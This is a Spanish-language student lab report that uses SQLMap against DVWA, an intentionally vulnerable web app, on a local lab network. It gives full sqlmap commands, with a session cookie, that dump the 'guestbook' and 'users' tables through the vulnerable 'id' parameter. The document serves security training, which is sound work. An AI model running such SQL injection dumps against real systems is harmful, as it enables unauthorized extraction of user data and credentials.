Apellidos:
Análisis de
vulnerabilidades
Nombre:
Actividades
Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).
Tendrás que:
Solución
Primero comprobamos que tanto la maquina atacante como la victima estén en la misma
red.
Al hacer clic en el botón Submit nuestra URL cambia ya que utiliza el metodo GET
para obtener la información ingresada y muestra el parametro vulnerable “id”
Con el siguiente comando podemos obtener los nombres de las bases de datos
disponibles.
Tabla guestbook
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#"
--dump --batch -T guestbook -D dvwa
Tabla users
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#"
--dump --batch -T users -D dvwa
Al finalizar nos retorna la tabla con los datos de los usuarios como se muestra a
continuación.